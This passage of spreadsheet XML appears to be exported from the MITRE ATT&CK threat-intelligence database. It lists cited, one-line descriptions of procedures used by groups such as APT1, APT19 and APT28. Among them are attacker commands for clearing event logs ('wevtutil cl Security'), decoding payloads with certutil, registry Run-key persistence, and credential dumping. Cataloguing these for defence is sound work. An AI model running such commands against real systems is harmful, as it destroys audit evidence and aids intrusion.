    <t>(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used a modified version of Mimikatz called Wrapikatz.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>(Citation: Dell TG-3390)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Iron Tiger April 2021)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZEUNION Feb 2019)</t>
  </si>
  <si>
    <t>(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) used PsExec to move laterally between computers on the victim’s network.(Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Kaspersky CactusPete Aug 2020)(Citation: Secureworks BRONZE HUNTLEY )(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>(Citation: TrendMicro Tonto Team October 2020)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky CactusPete Aug 2020)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 ProjectM March 2016)</t>
  </si>
  <si>
    <t>(Citation: Talos Oblique RAT March 2021)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Tropic Trooper Mar 2018)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: CitizenLab Tropic Trooper Aug 2018)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Tropic Trooper Nov 2016)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>(Citation: ESET Carbon Mar 2017)(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>(Citation: Symantec Waterbug)(Citation: Unit 42 IronNetInjector February 2021 )(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>(Citation: ESET Crutch December 2020)(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>(Citation: ESET Turla August 2018)(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Turla)(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Kazuar May 2017)(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>(Citation: ESET LightNeuron May 2019)(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>(Citation: ESET Turla Mosquito May 2018)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)(Citation: Secureworks IRON HUNTER Profile)</t>
  </si>
  <si>
    <t>(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>(Citation: ClearSky Lebanese Cedar Jan 2021)(Citation: CheckPoint Volatile Cedar March 2015)</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)</t>
  </si>
  <si>
    <t>(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Sophos New Ryuk Attack October 2020)</t>
  </si>
  <si>
    <t>(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Sophos New Ryuk Attack October 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>(Citation: Forbes Dyre May 2017)(Citation: CrowdStrike Wizard Spider March 2019)(Citation: Malwarebytes TrickBot Sep 2019)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Grim Spider May 2019)(Citation: Sophos New Ryuk Attack October 2020)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Ryuk January 2019)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Sophos New Ryuk Attack October 2020)</t>
  </si>
  <si>
    <t>(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Sophos New Ryuk Attack October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)</t>
  </si>
  <si>
    <t>(Citation: DFIR Ryuk's Return October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Grim Spider May 2019)(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Ryuk January 2019)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Sophos New Ryuk Attack October 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: Sophos New Ryuk Attack October 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020)(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: DOJ APT10 Dec 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has downloaded binary data from a specified domain after the malicious document is opened.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has prompted victims to accept macros in order to execute the subsequent payload.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has disguised its scheduled tasks as those used by Google.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has used port 4050 for C2 communications.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has used ConfuserEx to obfuscate its variant of [Imminent Monitor](https://attack.mitre.org/software/S0434), compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has used a macro function to set scheduled tasks, disguised as those used by Google.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT-C-36](https://attack.mitre.org/groups/G0099) has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway.(Citation: QiAnXin APT-C-36 Feb2019) </t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) obtained and used a modified variant of [Imminent Monitor](https://attack.mitre.org/software/S0434).(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) has embedded a VBScript within a malicious Word document which is executed upon the document opening.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has used RAR to compress files before moving them outside of the victim network.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used a batch script to perform a series of discovery techniques and saves it to a text file.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has collected files from a local victim.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has registered hundreds of domains for use in operations.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has created email accounts for later use in social engineering, phishing, and when registering domains.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has been known to use credential dumping using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used the commands &lt;code&gt;net localgroup&lt;/code&gt;,&lt;code&gt;net user&lt;/code&gt;, and &lt;code&gt;net group&lt;/code&gt; to find accounts on the system.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) uses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used publicly available malware for privilege escalation.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by [APT1](https://attack.mitre.org/groups/G0006) as a name for malware.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) listed connected network shares.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>The [APT1](https://attack.mitre.org/groups/G0006) group is known to have used pass the hash.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) gathered a list of running processes on the system using &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>The [APT1](https://attack.mitre.org/groups/G0006) group is known to have used RDP during operations.(Citation: FireEye PLA)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) uses two utilities, GETMAIL and MAPIGET, to steal email. MAPIGET steals email still on Exchange servers that has not yet been archived.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has sent spearphishing emails containing malicious attachments.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has sent spearphishing emails containing hyperlinks to malicious files.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used the &lt;code&gt;ipconfig /all&lt;/code&gt; command to gather network configuration information.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used the &lt;code&gt;net use&lt;/code&gt; command to get a listing on network connections.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) used the commands &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;tasklist&lt;/code&gt; to get a listing of the services on the system.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has used various open-source tools for privilege escalation purposes.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) has used the Windows command shell to execute commands, and batch scripting to automate execution.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used blogs and WordPress for C2 infrastructure.(Citation: Meyers Numbered Panda)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used multiple variants of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) including multiplying the first two octets of an IP address and adding the third octet to that value in order to get a resulting command and control port.(Citation: Meyers Numbered Panda)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities (CVE-2009-3129, CVE-2012-0158) and vulnerabilities in Adobe Reader and Flash (CVE-2009-4324, CVE-2009-0927, CVE-2011-0609, CVE-2011-0611).(Citation: Moran 2014)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has attempted to get victims to open malicious Microsoft Word and PDF attachment sent via spearphishing.(Citation: Moran 2014)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has sent emails with malicious Microsoft Office documents and PDFs attached.(Citation: Moran 2014)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[APT16](https://attack.mitre.org/groups/G0023) has compromised otherwise legitimate sites as staging servers for second-stage payloads.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>[APT17](https://attack.mitre.org/groups/G0025) has created and cultivated profile pages in Microsoft TechNet. To make profile pages appear more legitimate, [APT17](https://attack.mitre.org/groups/G0025) has created biographical sections and posted in forum threads.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[APT17](https://attack.mitre.org/groups/G0025) has created profile pages in Microsoft TechNet that were used as C2 infrastructure.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) actors used the native [at](https://attack.mitre.org/software/S0110) Windows task scheduler tool to use scheduled tasks for execution on a victim network.(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) uses DNS for C2 communications.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) actors leverage legitimate credentials to log into external remote services.(Citation: RSA2017 Detect and Respond Adair)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) actors deleted tools and batch files from victim systems.(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) can list files information for specific directories.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) can upload a file to the victim’s machine.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) obfuscates strings in the payload.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) establishes persistence via the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key.(Citation: Anomali Evasive Maneuvers July 2015)(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) can collect system information from the victim’s machine.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) uses HTTP for C2 communications.(Citation: PaloAlto DNS Requests May 2016)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) uses cmd.exe to execute commands on the victim’s machine.(Citation: PaloAlto DNS Requests May 2016)(Citation: Anomali Evasive Maneuvers July 2015)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) downloaded and launched code within a SCT file.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>An [APT19](https://attack.mitre.org/groups/G0073) HTTP malware variant decrypts strings using single-byte XOR keys.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) performed a watering hole attack on forbes.com in 2014 to compromise targets.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used &lt;code&gt;-W Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows by setting the WindowStyle parameter to hidden. (Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) attempted to get users to launch malicious attachments delivered via spearphishing emails.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) uses a Port 22 malware variant to modify several Registry keys.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used Base64 to obfuscate commands and the payload.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used PowerShell commands to execute payloads.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>An [APT19](https://attack.mitre.org/groups/G0073) HTTP malware variant establishes persistence by setting the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\&lt;/code&gt;.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used Regsvr32 to bypass application control techniques.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) configured its payload to inject into the rundll32.exe.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) sent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits.(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>An [APT19](https://attack.mitre.org/groups/G0073) HTTP malware variant used Base64 to encode communications to the C2 server.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) collected system architecture information. [APT19](https://attack.mitre.org/groups/G0073) used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim’s machine.(Citation: FireEye APT19)(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used an HTTP malware variant and a Port 22 malware variant to collect the victim’s username.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) has obtained and used publicly-available tools like [Empire](https://attack.mitre.org/software/S0363).(Citation: NCSC Joint Report Public Tools)(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) used HTTP for C2 communications. [APT19](https://attack.mitre.org/groups/G0073) also used an HTTP malware variant to communicate over HTTP for C2.(Citation: FireEye APT19)(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>An [APT19](https://attack.mitre.org/groups/G0073) Port 22 malware variant registers itself as a service.(Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a Powershell cmdlet to grant the &lt;code&gt;ApplicationImpersonation&lt;/code&gt; role to a compromised account.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail.(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used a variety of utilities, including WinRAR, to archive collected data with password protection.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used Google Drive for C2.(Citation: TrendMicro Pawn Storm Dec 2020)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has deployed a bootkit along with [Downdelph](https://attack.mitre.org/software/S0134) to ensure its persistence on the victim. The bootkit shares code with some variants of [BlackEnergy](https://attack.mitre.org/software/S0089).(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) can perform brute force attacks to obtain credentials.(Citation: TrendMicro Pawn Storm 2019)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Microsoft Targeting Elections September 2020)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has cleared event logs, including by using the commands &lt;code&gt;wevtutil cl System&lt;/code&gt; and &lt;code&gt;wevtutil cl Security&lt;/code&gt;.(Citation: Crowdstrike DNC June 2016)(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) uses a tool that captures information from air-gapped computers via an infected USB and transfers it to network-connected computer when the USB is inserted.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used COM hijacking for persistence by replacing the legitimate &lt;code&gt;MMDeviceEnumerator&lt;/code&gt; object with a payload.(Citation: ESET Sednit Part 1)(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has harvested user's login credentials.(Citation: Microsoft Targeting Elections September 2020)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has split archived exfiltration files into chunks smaller than 1MB.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has collected files from various information repositories.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has retrieved internal documents from machines inside victim environments, including by using [Forfiles](https://attack.mitre.org/software/S0193) to stage documents before exfiltration.(Citation: Überwachung APT28 Forfiles June 2015)(Citation: DOJ GRU Indictment Jul 2018)(Citation: TrendMicro Pawn Storm 2019)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has collected files from network shared drives.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) backdoor may collect the entire contents of an inserted USB device.(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>An [APT28](https://attack.mitre.org/groups/G0007) macro uses the command &lt;code&gt;certutil -decode&lt;/code&gt; to decode contents of a .txt file storing the base64 encoded payload.(Citation: Unit 42 Sofacy Feb 2018)(Citation: Palo Alto Sofacy 06-2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations.(Citation: FireEye APT28)(Citation: US District Court Indictment GRU Oct 2018)(Citation: Google TAG Ukraine Threat Landscape March 2022)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has compromised targets via strategic web compromise utilizing custom exploit kits.(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has delivered [JHUHUGIT](https://attack.mitre.org/software/S0044) and [Koadic](https://attack.mitre.org/software/S0250) by executing PowerShell commands through DDE in Word documents.(Citation: McAfee APT28 DDE1 Nov 2017)(Citation: McAfee APT28 DDE2 Nov 2017)(Citation: Palo Alto Sofacy 06-2018)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has used compromised email accounts to send credential phishing emails.(Citation: Google TAG Ukraine Threat Landscape March 2022)</t>
  </si>
  <si>
    <t>[APT28](https://attack.mitre.org/groups/G0007) has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
